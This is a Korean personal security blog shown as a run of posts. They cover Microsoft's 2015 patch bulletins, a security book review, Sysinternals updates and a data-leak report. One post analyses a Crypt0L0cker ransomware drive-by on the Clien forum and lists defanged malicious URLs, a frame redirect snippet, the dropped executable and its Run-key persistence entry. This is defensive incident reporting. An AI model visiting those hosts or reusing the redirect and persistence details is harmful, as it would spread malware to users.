이 보안 업데이트는 Microsoft Windows의 취약성을 해결합니다. 이 취약성은 Internet Explorer를 통해 임의의 코드가 실행될 수 있는 또 다른 취약성과 결합하여 사용하는 경우 권한 상승을 허용할 수 있습니다. 다른 취약성이 악용되면, 공격자는 이 공지에서 해결된 취약성을 악용해 임의의 코드가 중간 무결성 수준에서 실행되도록 할 수 있습니다.

- 다양한 OLE 권한 상승 취약성:

  CVE-2015-2416, CVE-2015-2417


13. MS15-076 (중요) : Windows 원격 프로시저 호출의 취약성으로 인한 권한 상승 문제(3067505)

이 보안 업데이트는 Microsoft Windows의 취약성을 해결합니다. 공격자가 영향받는 시스템에 로그온한 후 특수 제작된 응용 프로그램을 실행하는 경우 Windows RPC(원격 프로시저 호출) 인증에 존재하는 이 취약성으로 인해 권한 상승이 허용될 수 있습니다. 이 취약성 악용에 성공한 경우 공격자는 영향받는 시스템을 완전히 제어할 수 있습니다. 이렇게 되면 공격자가 프로그램을 설치하거나, 데이터를 보거나 변경하거나 삭제하거나, 모든 사용자 권한이 있는 새 계정을 만들 수 있습니다.

- Windows RPC 권한 상승 취약성(CVE-2015-2370)


14. MS15-077 (중요) : ATM Font Driver의 취약성으로 인한 권한 상승 문제(3077657)

이 보안 업데이트는 Microsoft Windows의 취약성을 해결합니다. 공격자가 대상 시스템에 로그온하고 특수 제작된 응용 프로그램을 실행하는 경우 이 취약성으로 인해 권한 상승이 허용될 수 있습니다. 이러한 취약성을 악의적으로 이용하는 공격자는 임의 코드를 실행하고 영향을 받는 시스템을 완전히 제어할 수 있습니다. 이렇게 되면 공격자가 프로그램을 설치하거나, 데이터를 보거나 변경하거나 삭제하거나, 모든 사용자 권한이 있는 새 계정을 만들 수 있습니다.

- ATMFD.DLL 메모리 손상 취약성(CVE-2015-2387)





블로그 이미지

처리 

이것 저것 끄적여 보는 공간으로 만들었습니다.





네이버 대표 보안카페인 [바이러스제로 시즌2]에서 지난 6월 말경 펜타시큐리티팀이 저자한 "IT보안의 정석" 이라는 

정보보안 도서의 서평단을 모집했다.


최근 책을 읽어본게 언제인지 기억도 안날 정도라 ㅠㅠ

이번 기회를 비로서 서평단 모집에 참여했더니 좋은 결과가 있어서 직접 책을 받게 되었다.


우선 이 책을 다 읽진 못했지만, 

전반적으로 쉬운 문구들은 아니였다.


쉽게 설명을 하려고 노력은 했지만, 대상이 일반인이 아닌 CEO 이기 때문에 어느정도 전문성은 있다고 봐야한다.

그래서 책의 부제도 "CEO가 알아야 할 기업정보보안의 기본" 이라고 쓴 듯 하다^^


CEO라면 이정도 전문화 된 서적 정도는 읽어야 하는거다 ㅠㅠ


전체적인 내용이 암호화에 대한 설명이 좀 많아보이긴한다.


나도 이쪽에 대해서는 아직 모르는 부분이 많기 때문에 얼렁 Part2로 넘어가서 암호화를 좀 배워야겠다^^


도서명 : IT보안의 정석 - ceo가 알아야 할 기업정보보안의 기본


가격 : 14,000원


목차 : 


part 01. ICT 리스크, 실상과 허상

소를 잃을 수밖에 없는 외양간 14

하인리히 법칙, 절벽 끝에 매달린 보안 27

그들이 유출에 대비하는 법 34

공인인증서의 허와 실 40

소 잃고 엉뚱한 외양간 고치기, 이젠 지겨워 46

정보보안은 기업의 몫이다 53

금고에 든 돈을 지키는 일 60

‘연애의 목적’만큼 중요한 ‘보안의 목적’ 67

손자와 프리드리히에게 배우는 보안 73

“내가 간첩이다” 77

이제는 공부를 해야 할 때 83

보안 기술이란? 86


part 02. 정보보안의 핵심, ‘웹 보안’과 ‘데이터 암호화’

정보보안 엑기스? 96

완벽한 보안은 없다! 데이터만 사수하라! 106

웹 보안은 선택이 아닌 필수다 115

웹 위협의 심각성 118

웹 공격의 유형 121

‘전자상거래’는 죄가 없다 125

웹 보안의 정석 134

실전 웹 보안 146

데이터 암호화에 대해 반드시 알아야 할 것들 151

바람직한 데이터 암호화 시스템 161

플랫폼과 데이터 암호화 167

가장 중요한 데이터 암호화 171

아예 통째로 암호화해버려? 180

데이터 암호화, 그리고 접근제어 186

ERP 시스템의 데이터 암호화 190

나만 안전하면 된다? 197

‘누구’인지 밝혀라 204


part 03. ICT 신조류의 도전, 보안의 응전

웹사이트는 ‘홈페이지’가 아니다! 212

본격 ‘웹 시대’, 기업보안의 3대 요소 225

사물인터넷과 정보보안 236

목숨이 걸린 자동차 보안! 242

클라우드 보안 248

빅데이터, 정체를 밝혀라 253

‘데이터=패턴’, 빅데이터를 활용한 정보보안 260

개인정보 비식별화 269

메신저, 내 대화를 지켜줘 278

발등 찍는 도끼 ‘SSL 암호화 통신’ 288

양자 컴퓨터? 295

‘핀테크 보안’도 결국, 웹 보안 & 데이터 암호화! 300


구입처 : http://book.naver.com/bookdb/book_detail.nhn?bid=9202767


블로그 이미지

처리 

이것 저것 끄적여 보는 공간으로 만들었습니다.



마이크로소프트(Microsoft)에서 매월 정기적으로 제공하는 2015년 6월 정기 보안 업데이트가 발표 되었습니다.


이번 업데이트에서는 Microsoft Windows, Internet Explorer, Microsoft Office, Microsoft Exchange Server 제품군에서 

발견된 보안취약점(45건)을 해결한 8건의 보안 패치(긴급2, 중요6)로 이루어져 있습니다.


※ 최신 버전이 아닌 상태에서 해당 제품 사용시 "공개된 취약점을 이용한 신종 악성코드" 등 보안 위협에 쉽게 노출될 수 있으니, 
해당 제품을 사용하시는 사용자들은 아래의 해결책을 참고해서 최신 버전으로 업데이트 후 사용바랍니다.

※ 아래의 링크를 클릭하면 해당 취약점에 대한 정보를 볼 수 있다.

1. MS15-056 (긴급) : Internet Explorer용 누적 보안 업데이트(3058515)

이 보안 업데이트는 Internet Explorer의 취약성을 해결합니다. 이 중에서 가장 심각한 취약성은 사용자가 Internet Explorer를 사용하여 특수 제작된 웹 페이지를 볼 경우 원격 코드 실행을 허용할 수 있습니다. 이 취약성 악용에 성공한 공격자는 현재 사용자와 동일한 사용자 권한을 얻을 수 있습니다. 시스템에 대한 사용자 권한이 적게 구성된 계정의 고객은 관리자 권한으로 작업하는 고객에 비해 영향을 적게 받습니다.

- Internet Explorer 정보 유출 취약성(CVE-2015-1765)

- 다양한 권한 상승 취약성:

  CVE-2015-1739, CVE-2015-1743, CVE-2015-1748

- 다양한 Internet Explorer의 메모리 손상 취약성:

  CVE-2015-1687, CVE-2015-1730, CVE-2015-1731, CVE-2015-1732, CVE-2015-1735

  CVE-2015-1736, CVE-2015-1737, CVE-2015-1740, CVE-2015-1741, CVE-2015-1742

  CVE-2015-1744, CVE-2015-1745, CVE-2015-1747, CVE-2015-1750, CVE-2015-1751

  CVE-2015-1752, CVE-2015-1753, CVE-2015-1754, CVE-2015-1755, CVE-2015-1766



2. MS15-057 (긴급) : Windows Media Player의 취약성으로 인한 원격 코드 실행 문제(3033890)

이 보안 업데이트는 Microsoft Windows의 취약성을 해결합니다. 이 취약성으로 인해 Windows Media Player가 악의적인 웹 사이트에서 호스트되는 특수 제작된 미디어 콘텐츠를 여는 경우 원격 코드 실행이 허용될 수 있습니다. 이러한 취약성을 악의적으로 이용하는 공격자는 영향받는 시스템을 원격으로 완전히 제어할 수 있습니다. 시스템에 대한 사용자 권한이 적게 구성된 계정의 사용자는 관리자 권한으로 작업하는 사용자보다 영향을 덜 받을 수 있습니다.

- DataObject를 통한 Windows Media Player RCE 취약성 - CVE-2015-1728


3. MS15-059 (중요) : Microsoft Office의 취약성으로 인한 원격 코드 실행 문제(3064949)

이 보안 업데이트는 Microsoft Office의 취약성을 해결합니다. 이 중에서 가장 심각한 취약성은 사용자가 특수 제작된 Microsoft Office 파일을 열 경우 원격 코드 실행을 허용할 수 있습니다. 이러한 취약성 악용에 성공한 공격자는 현재 사용자의 컨텍스트에서 임의의 코드를 실행할 수 있습니다. 시스템에 대한 사용자 권한이 적게 구성된 계정의 고객은 관리자 권한으로 작업하는 고객에 비해 영향을 적게 받습니다.

 Microsoft Office 초기화되지 않은 메모리 사용 취약성(CVE-2015-1770)

- 다양한 Microsoft Office 메모리 손상 취약성:

  CVE-2015-1759, CVE-2015-1760


4. MS15-060 (중요) : Microsoft 공용 컨트롤의 취약성으로 인한 원격 코드 실행 문제(3059317)

이 보안 업데이트는 Microsoft Windows의 취약성을 해결합니다. 사용자가 특수 제작된 링크나 특수 제작된 콘텐츠의 링크를 클릭한 다음 Internet Explorer에서 F12 개발자 도구를 호출하는 경우 이러한 취약성으로 인해 원격 코드 실행이 허용될 수 있습니다

- Microsoft 공용 컨트롤 해제 후 사용 취약성(CVE-2015-1756)


5. MS15-061 (중요) : Windows 커널 모드 드라이버의 취약성으로 인한 권한 상승 문제(3057839)

이 보안 업데이트는 Microsoft Windows의 취약성을 해결합니다. 이 중에서 가장 심각한 취약성은 공격자가 시스템에 로그온하고 특수 제작된 응용 프로그램을 실행할 경우 권한 상승을 허용할 수 있습니다. 이렇게 되면 공격자가 프로그램을 설치하거나, 데이터를 보거나 변경하거나 삭제하거나, 모든 사용자 권한이 있는 새 계정을 만들 수 있습니다.

- Microsoft Windows 커널 정보 유출 취약성(CVE-2015-1719)

- Microsoft Windows 커널 해제 후 사용 취약성(CVE-2015-1720)

- Win32k Null 포인터 역참조 취약성(CVE-2015-1721)

- 다양한 Microsoft Windows 커널 취약성:

  CVE-2015-1722, CVE-2015-1723, CVE-2015-1724, CVE-2015-1726

- 다양한 Windows 커널 버퍼 오버플로 취약성:

  CVE-2015-1725, CVE-2015-1727

- 다양한 Win32k 메모리 손상 권한 상승 취약성:

  CVE-2015-1768, CVE-2015-2360


6. MS15-062 (중요) : Active Directory Federation Services의 취약성으로 인한 권한 상승 문제(3062577)

이 보안 업데이트는 Microsoft AD FS(Active Directory Federation Services)의 취약성을 해결합니다. 이 취약성으로 인해 공격자가 특수 제작된 URL을 대상 사이트에 제출하는 경우 권한 상승이 허용될 수 있습니다. 특정 상황에서 이 취약성으로 인해, 특수 제작된 스크립트가 적절하게 삭제되지 않으며, 공격자가 제공하는 스크립트가 악성 콘텐츠를 보는 사용자의 보안 컨텍스트에서 실행되는 결과로 이어질 수 있습니다. 이 취약성을 이용한 교차 사이트 스크립팅 공격의 경우 사용자가 손상된 사이트를 방문해야 악의적인 동작이 발생합니다.

- ADFS XSS 권한 상승 취약성(CVE-2015-1757)


7. MS15-063 (중요) : Windows 커널의 취약성으로 인한 권한 상승 문제(3063858)

이 보안 업데이트는 Microsoft Windows의 취약성을 해결합니다. 이 취약성은 공격자가 컴퓨터나 네트워크 공유의 로컬 디렉터리에 악성 .dll 파일을 저장하는 경우 권한 상승을 허용할 수 있습니다. 그런 다음 공격자는 권한 상승이 발생하도록 악성 .dll 파일을 로드할 수 있는 프로그램을 사용자가 실행하기까지 기다려야 합니다. 그러나 어떠한 경우에도 공격자는 강제로 사용자가 해당 네트워크 공유나 웹 사이트를 방문하도록 만들 수 없습니다.

- Windows LoadLibrary EoP 취약성(CVE-2015-1758)


8. MS15-064 (중요) : Microsoft Exchange Server의 취약성으로 인한 권한 상승 문제(3062157)

이 보안 업데이트는 Microsoft Exchange Server의 취약성을 해결합니다. 이 중에서 가장 심각한 취약성은 인증된 사용자가 특수 제작된 웹 페이지의 링크를 클릭하는 경우 권한 상승을 허용할 수 있습니다. 공격자는 강제로 사용자가 웹 사이트를 방문하도록 할 수 없습니다. 대신 공격자는 일반적으로 전자 메일 또는 인스턴트 메신저 메시지에서 유인물을 이용하여 사용자가 이 링크를 클릭하도록 유도해야 합니다.

- Exchange 서버 쪽 요청 위조 취약성(CVE-2015-1764)

- Exchange 교차 사이트 요청 위조 취약성(CVE-2015-1771)

- Exchange HTML 삽입 취약성(CVE-2015-2359)





블로그 이미지

처리 

이것 저것 끄적여 보는 공간으로 만들었습니다.




마이크로소프트(Microsoft)에서 매월 정기적으로 제공하는 2015년 5월 정기 보안 업데이트가 발표 되었습니다.


Microsoft Windows, Internet Explorer, Microsoft .NET Framework, Microsoft Office, Microsoft Lync, Microsoft Silverlight, 

Microsoft Server 소프트웨어 제품에서 발견된 보안취약점(48건)을 해결한 13건의 보안 패치(긴급3, 중요10)로 이루어져 

있습니다.



※ 최신 버전이 아닌 상태에서 해당 제품 사용시 "공개된 취약점을 이용한 신종 악성코드" 등 보안 위협에 쉽게 노출될 수 있으니, 
해당 제품을 사용하시는 사용자들은 아래의 해결책을 참고해서 최신 버전으로 업데이트 후 사용바랍니다.

※ 아래의 링크를 클릭하면 해당 취약점에 대한 정보를 볼 수 있다.

1. MS15-043 (긴급) : Internet Explorer용 누적 보안 업데이트(3049563) 

이 보안 업데이트는 Internet Explorer의 취약성을 해결합니다. 이 중에서 가장 심각한 취약성은 사용자가 Internet Explorer를 사용하여 특수 제작된 웹 페이지를 볼 경우 원격 코드 실행을 허용할 수 있습니다. 이 취약성 악용에 성공한 공격자는 현재 사용자와 동일한 권한을 얻을 수 있습니다. 시스템에 대한 사용자 권한이 적게 구성된 계정의 고객은 관리자 권한으로 작업하는 고객에 비해 영향을 적게 받습니다.

- Internet Explorer 메모리 손상 취약점 : 

CVE-2015-1658, CVE-2015-1689, CVE-2015-1691, CVE-2015-1694, CVE-2015-1705~1712, CVE-2015-1706, CVE-2015-1714, CVE-2015-1717, CVE-2015-1718

- Internet Explorer VBScript ASLR 우회 취약점 (CVE-2015-1684)

- Internet Explorer ASLR 우회 취약점(CVE-2015-1685)

- Internet Explorer VBScript ASLR 및 JScript ASLR 우회 취약점(CVE-2015-1686)

- Internet Explorer 클립보드 정보 유출 취약점(CVE-2015-1692)

- Internet Explorer 권한 상승 취약점(CVE-2015-1703~1704, CVE-2015-1713)


2. MS15-044 (긴급) : Microsoft 글꼴 드라이버의 취약성으로 인한 원격 코드 실행 문제(3057110) 

이 보안 업데이트는 Microsoft Windows, Microsoft .NET Framework, Microsoft Office, Microsoft Lync 및 Microsoft Silverlight의 취약성을 해결합니다. 이 중에서 가장 심각한 취약성은 사용자가 특수 제작된 문서를 열거나 포함된 트루타입 글꼴이 있는 신뢰할 수 없는 웹 페이지를 방문하는 경우 원격 코드 실행을 허용할 수 있습니다.

- OpenType 글꼴 구문 분석 취약성(CVE-2015-1670)

- 트루타입 글꼴 구문 분석 취약점(CVE-2015-1671)


3. MS15-045 (긴급) : Windows 필기장의 취약성으로 인한 원격 코드 실행 문제(3046002) 

이 보안 업데이트는 Microsoft Windows의 취약성을 해결합니다. 이 취약성으로 인해 사용자가 특수 제작된 필기장 파일을 여는 경우 원격 코드 실행이 허용될 수 있습니다. 시스템에 대한 사용자 권한이 적게 구성된 계정의 사용자는 관리자 권한으로 작업하는 사용자보다 영향을 덜 받을 수 있습니다.

- Windows 필기장 원격 코드 실행 취약점(CVE-2015-1675, CVE-2015-1695, CVE-2015-1696, CVE-2015-1697, CVE-2015-1698, CVE-2015-1699)


4. MS15-046 (중요) : Microsoft Office의 취약성으로 인한 원격 코드 실행 문제(3057181)

이 보안 업데이트는 Microsoft Office의 취약성을 해결합니다. 이 중에서 가장 심각한 취약성은 사용자가 특수 제작된 Microsoft Office 파일을 열 경우 원격 코드 실행을 허용할 수 있습니다. 이러한 취약성 악용에 성공한 공격자는 현재 사용자의 컨텍스트에서 임의의 코드를 실행할 수 있습니다. 시스템에 대한 사용자 권한이 적게 구성된 계정의 고객은 관리자 권한으로 작업하는 고객에 비해 영향을 적게 받습니다.

- Microsoft Office 메모리 손상 취약점(CVE-2015-1682, CVE-2015-1683)


5. MS15-047 (중요) : Microsoft SharePoint Server의 취약성으로 인한 원격 코드 실행 문제(3058083) 

이 보안 업데이트는 Microsoft Office 서버 소프트웨어의 취약성을 해결합니다. 인증된 공격자가 SharePoint 서버에 특수 제작된 페이지를 보내는 경우 이 취약성으로 인해 원격 코드 실행이 허용될 수 있습니다. 이 취약성 악용에 성공한 공격자는 대상 SharePoint 사이트의 W3WP 서비스 계정 보안 컨텍스트에서 임의의 코드를 실행할 수 있습니다.

- Microsoft SharePoint 페이지 콘텐츠 취약성(CVE-2015-1700)


6. MS15-048 (중요) : .NET Framework의 취약성으로 인한 권한 상승 문제(3057134) 

이 보안 업데이트는 Microsoft .NET Framework의 취약성을 해결합니다. 이 중에서 가장 심각한 취약성은 사용자가 특수 제작된 부분 신뢰 응용 프로그램을 설치하는 경우 권한 상승을 허용할 수 있습니다.

- .NET XML 암호 해독 서비스 거부 취약점(CVE-2015-1672)

- Windows Forms 권한 상승 취약점(CVE-2015-1673)


7. MS15-049 (중요) : Silverlight의 취약성으로 인한 권한 상승 문제(3058985) 

이 보안 업데이트는 Microsoft Silverlight의 취약성을 해결합니다. 영향받는 시스템에서 특수 제작된 Silverlight 응용 프로그램을 실행하면 이 취약성으로 인해 권한 상승이 허용될 수 있습니다. 이 취약성을 악용하기 위해 공격자는 먼저 시스템에 로그온해야 하거나 로그온한 사용자가 특수 제작된 응용 프로그램을 실행하도록 유도해야 합니다.

- Microsoft Silverlight의 브라우저 외부에서 실행하는 응용 프로그램 취약점(CVE-2015-1715)


8. MS15-050 (중요) : 서비스 제어 관리자의 취약성으로 인한 권한 상승 문제(3055642) 

이 보안 업데이트는 Windows SCM(서비스 제어 관리자)의 취약성을 해결합니다. 이 취약성은 SCM이 부적절하게 가장 수준을 확인하는 경우 발생합니다. 이 취약성은 공격자가 먼저 시스템에 로그온한 후 권한을 상승시키도록 디자인된 특수 제작된 응용 프로그램을 실행하는 경우 권한 상승을 허용할 수 있습니다.

- 서비스 제어 관리자 권한 상승 취약점(CVE-2015-1702)


9. MS15-051 (중요) : Windows 커널 모드 드라이버의 취약성으로 인한 권한 상승 문제(3057191)

이 보안 업데이트는 Microsoft Windows의 취약성을 해결합니다. 이 중에서 가장 심각한 취약성은 공격자가 로컬로 로그온하고 커널 모드에서 임의의 코드를 실행하는 경우 권한 상승을 허용할 수 있습니다. 이렇게 되면 공격자가 프로그램을 설치할 수 있을 뿐 아니라 데이터를 보거나 변경하거나 삭제하거나, 모든 사용자 권한이 있는 새 계정을 만들 수도 있습니다. 공격자는 이 취약성을 이용하기 위해 유효한 로그온 자격 증명이 있어야 하며 로컬로 로그온할 수 있어야 합니다. 이 취약성은 원격으로 또는 익명 사용자가 악용할 수 없습니다.

- Microsoft Windows 커널 메모리 공개 취약성(CVE-2015-1676, CVE-2015-1677, CVE-2015-1678, CVE-2015-1679, CVE-2015-1680)

- Win32k 권한 상승 취약성(CVE-2015-1701)


10. MS15-052 (중요) : Windows 커널의 취약성으로 인한 보안 기능 우회 문제(3050514)

이 보안 업데이트는 Microsoft Windows의 취약성을 해결합니다. 이 취약성은 공격자가 영향받는 시스템에 로그온한 후 특수 제작된 응용 프로그램을 실행하는 경우 보안 기능 우회를 허용할 수 있습니다.

- Windows 커널 보안 기능 우회 취약성(CVE-2015-1674)


11. MS15-053 (중요) : JScript 및 VBScript 스크립팅 엔진의 취약성으로 인해 보안 기능 우회 문제(3057263

이 보안 업데이트는 Microsoft Windows에서 JScript 및 VBScript 스크립팅 엔진의 ASLR 보안 기능 우회를 해결합니다. 공격자는 대상 시스템에서 임의의 코드를 보다 확실하게 실행하기 위해 원격 코드 실행 취약성 등 다른 취약성과 함께 이러한 ASLR 우회 중 하나를 사용할 수 있습니다.

- VBScript ASLR 우회 취약점(CVE-2015-1684)

- VBScript 및 JScript ASLR 우회 취약점(CVE-2015-1686)


12. MS15-054 (중요) : Microsoft Management Console 파일 형식의 취약성으로 인한 서비스 거부 문제(3051768)

이 보안 업데이트는 Microsoft Windows의 취약성을 해결합니다. 인증되지 않은 원격 공격자가 사용자가 특수 제작된 .msc 파일이 포함된 공유를 열도록 유도하는 경우 이 취약성으로 인해 서비스 거부가 허용될 수 있습니다. 하지만 공격자가 강제로 사용자가 이 공유를 방문하거나 해당 파일을 보도록 할 수 있는 방법은 없습니다.

- Microsoft Management Console 파일 형식의 서비스 거부 취약점(CVE-2015-1681)


13. MS15-055 (중요) : Schannel의 취약성으로 인한 정보 유출 문제(3061518) 

이 보안 업데이트는 Microsoft Windows의 취약성을 해결합니다. Schannel(보안 채널)이 암호화된 TLS 세션에서 512비트의 취약한 DHE(Diffie-Hellman ephemeral) 키 길이 사용을 허용하는 경우 이 취약성으로 인해 정보 유출이 허용될 수 있습니다. 512비트 DHE 키를 허용하면 다양한 공격에 DHE 키 교환이 노출되고 취약하게 만듭니다. 공격이 성공하려면 서버에서 512비트 DHE 키 길이를 지원해야 합니다. 기본 구성의 Windows 서버에서 허용되는 최소 DHE 키 길이는 1024비트입니다.

- Schannel 정보 유출 취약점(CVE-2015-1716)




블로그 이미지

처리 

이것 저것 끄적여 보는 공간으로 만들었습니다.




Sysinternals Tool 중 몇가지가 업데이트 되었네요! 

링크 연결 하오니~ 필요하신 분들은 다운로드 받으세요!!

이번 업데이트에서는 기존의 AccessChk v6.0, Autoruns v13.4, Process Monitor v3.2, VMMap v3.2가 업데이트가 되었습니다.
특히 많이 사용되는 Autoruns 나 Process Monitor도 업데이트 되었으니 최신으로 사용하세요.

- 업데이트 목록(클릭하시면 새창으로 이동합니다)

■ AccessChk v6.0

This update to AccessChk, a command-line utility that shows effective and actual permissions for registry keys, files, services, kernel objects, and more, can now show the permissions and security descriptors assigned to event logs, and incorporates owner-rights accesses in its permissions evaluations.


■ Autoruns v13.4

Autoruns, the most comprehensive utility available for showing what executables, DLLs, and drivers are configured to automatically start and load, now reports Office addins, adds several additional autostart locations, and no longer hides hosting executables like cmd.exe, powershell.exe and others when Windows and Microsoft filters are in effect.


■ Process Monitor v3.2

Process Monitor, a real-time system monitoring utility that captures registry, file system, process and thread, CPU, DLL and network activity, adds an option to show all file system values in hexadecimal, adds additional error code and file system control strings, and fixes a bug that prevented boot capture on Windows 10.


■ VMMap v3.2

This release of VMMap, a powerful tool for analyzing the virtual and physical memory usage of a process, fixes a bug that prevented it from working with the 2 TB reserved memory region introduced to support Control Flow Guard (CFG).


블로그 이미지

처리 

이것 저것 끄적여 보는 공간으로 만들었습니다.




국내 최대 웹기반 RSS 리더인 "한RSS(hanrss)" 사이트가 2015년 5월 31일자로 서비스를 종료한다고 합니다.

블로그를 하면서 다른 이웃블로그 및 외국 블로그들의 RSS를 모두 한RSS로 읽던 저로서는 ㅠㅠ


종료가 너무나 아쉽게 느껴집니다.

요즘 한RSS 접속속도나 뭔가 모르게 좀 이상하다고 느껴지진 했는데, 이럴려고 그랬었나보군요.


[중요공지] 한RSS  서비스 종료 안내



5월 31일에 종료되면 다른 RSS를 찾아가야 하는데 그 동안 모아둔 RSS주소들이 너무 아깝습니다.

이에 RSS 목록을 백업하는 방법에 대해 알아보겠습니다.


한RSS 좌측 중간쯤 보면 "부가기능" 이라고 있습니다.

이 중 RSS목록(OPML) 내보내기를 클릭하시면 됩니다.



그럼 아래 그림과 같이 OPML 파일을 저장 할 수 있습니다.

이 파일을 다른 RSS리더 사이트에 연동하면 지금 받고 있었던 사이트들을 다시 만날 수 있습니다.


괜찮은 RSS 리더 있으시면 댓글로 추천 부탁드려요^^

블로그 이미지

처리 

이것 저것 끄적여 보는 공간으로 만들었습니다.




2015년 4월 21일 금일 새벽부터 국내 커뮤니티 사이트인 클리앙에서 악성코드 유포가 있었다.

클리앙측 이야기로는 새벽 01:38분부터 오전 11:12까지 유포가 진행 되었다고 한다.



설치 된 악성코드는 사용자의 문서, 그림, 동영상들을 강제로 암호화 시켜 암호화 해제를 빌미로 돈을 뜯어대는 

랜섬웨어(Ransomware)의 일종으로 Crypt0L0cker(크립토락커) 라는 악성코드로 확인되었다.


크립토락커 랜섬웨어는 이전에도 존재하였지만, 이번이 이슈가 되는 이유는 한글화 작업을 통해 

국내 드라이브 바이 다운로드(Drive-By-Download) 경로를 이용하고 있다는 것이다.


이를 통해 기존의 국내에서 많이 사용되고 있는 SweetOrange Exploit Kit 이나 CK Exploit Kit 도

랜섬웨어를 다운로드 시킬 가능성이 매우 높아졌다.


유포 경로는 클리앙 사이트에 올려진 외부 배너링크를 통해 악성 URL이 넘어 온 것으로 보인다.

클리앙 사이트는 아래 그림과 같이 "메인상단, 우상단, 게시판상단" 총 3개의 외부 배너를 가지고 있었다.


이 중 어떤 곳에서 악성 URL을 연결시켰는지는 알 수 없지만, 외부 광고 배너를 통해 악성URL 이 유포 된 것은 맞는 듯 하다.

(※ 현재는 모든 외부 배너를 삭제 한 상태이다)

(그림 출처 : 클리앙 광고 안내 페이지 http://www.clien.net/cs2/bbs/board.php?bo_table=notice&wr_id=8709)



현재까지 확인 된 내용으로는 아래와 같은 링크와 같은 URL들이 확인 되었다.

(아직 확실한 사실이 아니니 너무 신뢰하진 말자!!)

- 클리앙 외부 배너 광고 서버 URL (아직 미확인)

 ㄴ hxxp://medbps.filmwedding.ro/lrvqdg2.html


hxxp://medbps.filmwedding.ro/lrvqdg2.html

 ㄴ 해당 웹 파일에서 frame 태그를 이용하여 악성 URL로 넘기는 것으로 보인다.


<frameset rows="100%">

<frame src="hxxp://row.bottomwebsites.xyz/bewilders_urchin_platters_valid/17372163791826990">...</frame>



클리앙 크립토락커에 관련되어 개인 보안 블로그 및 보안업체 블로그에도 글이 하나씩 올라오고 있다.


금일 클리앙 외부광고 배너를 통해 설치 된 크립토락커 악성코드의 행위는 아래와 같다.

- 파일 생성

C:\Windows\esihuzaw.exe (Alyac : Trojan.Ransom.cryptolocker)


- 레지스트리 생성

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

"ipumjvuc" = "C:\WINDOWS\esihuzaw.exe"


- 파일 암호화

아래의 확장자를 제외한 모든 파일들을 암호화 알고리즘(RSA-2048)을 이용하여 "원본파일명.encrypted" 로 변경한다. 

(ex : 겨울.jpg.encrypted)

*.chm, *.ini, *.tmp, *.log, *.url, *.lnk, *.cmd, *.bat, *.scr, *.msi, *.sys, *.dll, *.exe


감염 된 PC에서는 아래와 같은 화면등을 볼 수 있다.




이후 암호화 해제를 위해 해독 프로그램을 구입하라는 창도 볼 수 있다.


크립토락커 악성코드에 감염이 되면 악성코드 자체는 삭제가 가능하지만,
암호화 된 파일들은 특정 암호키가 없으면 복구가 불가능 하다.

제작자에게 약 43만원 정도의 금액을 입금하면 암호키를 줄 수도 있겠지만, 무모한 도전은 안하는 것이 좋겠다.

현재 대부분의 보안업체에서 해당 파일을 탐지하고 있으니 사용하는 보안 프로그램을 최신 업데이트로 유지하고
실시간 감시를 켜두는 것이 좋다.


블로그 이미지

처리 

이것 저것 끄적여 보는 공간으로 만들었습니다.




세종시에 위치한 수목원인 베어트리파크개인정보 약 2만 8천건이 웹상에 노출 되는 사실이 2015-04-14일에 확인되었다.


이번 웹상 노출의 원인은 홈페이지 리뉴얼 과정에서 발생되었다고 베어트리파크 측에서 설명하였으며,

일정 시간 동안 웹상에 파일로 노출이 되었지만, 신고 즉시 해당 홈페이지는 삭제조치 하였다고 한다.


웹상에 유출 된 파일에는 2009년부터 지난 2014년 11월까지 가입 한 이용자의 

"이름, 아이디, 비밀번호, 주민등록번호, 우편번호, 주소, 전화번호, 휴대폰번호, 이메일, 가입일" 등 개인에 대한 

모든 정보가 기재되어 있다고 한다.



□ 베어트리파크 개인정보 유출 관련 내용


※ 서버에 저장 된 개인정보는 모두 암호화하여 저장해야 했는데, 이 파일 자체가 암호화가 안되어 있다는건 큰 문제다. 

   이번 홈페이지 리뉴얼을 하면서 DB도 리뉴얼 하길 바란다.



현재 베어트리파크에서는 홈페이지에 유출에 관한 공지사항을 팝업으로 알려주고 있다.

블로그 이미지

처리 

이것 저것 끄적여 보는 공간으로 만들었습니다.





지난 15일에 업데이트 된 구글 크롬 42버전에서 "NPAPI 플러그인" 이 해제되어 있는 것을 확인되었다.


※ NPAPI란?

'넷스케이프 플러그인 API'의 약자다. 

사파리, 오페라, 크롬, 파이어폭스 등 주요 PC용 브라우저에서 플러그인 프로그램 기능을 설치, 실행할 수 있게 해주는 기술이다. 인터넷익스플로러(IE)의 '액티브X'같은 역할을 한다. 


by ZDnet


이미 구글에서는 2013년 9월달 부터 NPAPI를 단계적으로 제거 한다고 발표를 했다고 하는데 기억은 잘 안남;;

이에 따라 오는 2015년 9월에 출시할 45버전에서는 아예 NPAPI를 영구적으로 제거한다고 한다.

(이에 가장 큰 문제가 오픈뱅킹이 아닐까 싶다 ㅋㅋㅋ)



■ 관련 기사



처음에는 몰랐는데, Pig Toolbox 확장프로그램을 통해 크롬의 탭을 더블클릭하면 탭이 닫혔는데 그 기능이 되지 않았다.

이것 저것 찾아보다 보니 원인을 알게 되었다.




그래서 Pig Toolbox 의 옵션에 들어갔더니 아래와 같은 문구가 상단에 있었다.


"Pig Toolbox 윈도우용 NPAPI 플러그인 로딩에 실패했습니다. 윈도우 전용 기능들이 작동하지 않습니다"




이런 제길??

그럼 어떻게 해야하지? 라고 생각했을 때 벌새님의 블로그에 해당 내용이 올라왔다.


[울지않는벌새] Google Chrome 42 버전 업데이트 후 NPAPI 플러그인 활성화 방법



블로그 내용에 따라 크롬 주소창에 "chrome://flags/" 또는 "chrome://flags/#enable-npapi" 를 입력 한 후 

npapi 플러그인을 활성화 시키면 된다.





NPAPI 플러그인을 활성화 한 후 브라우저 재시작을 하면 Pig Toolbox 옵션이 예전처럼 정상으로 돌아 온 것을 알 수 있다.


그리고 탭 더블 클릭으로 닫히는것도 잘 되고 있다^^




블로그 이미지

처리 

이것 저것 끄적여 보는 공간으로 만들었습니다.



마이크로소프트(Microsoft)에서 매월 정기적으로 제공하는 2015년 4월 정기 보안 업데이트가 발표 되었습니다.


이번 업데이트에서는 Microsoft Windows, Internet Explorer, Microsoft Office, Microsoft Server 소프트웨어, 생산성 소프트웨어, 

Microsoft .NET Framework 제품군에서 발견된 보안취약점(26건)을 해결한 11건의 보안 패치(긴급4, 중요7)로 이루어져 

있습니다.




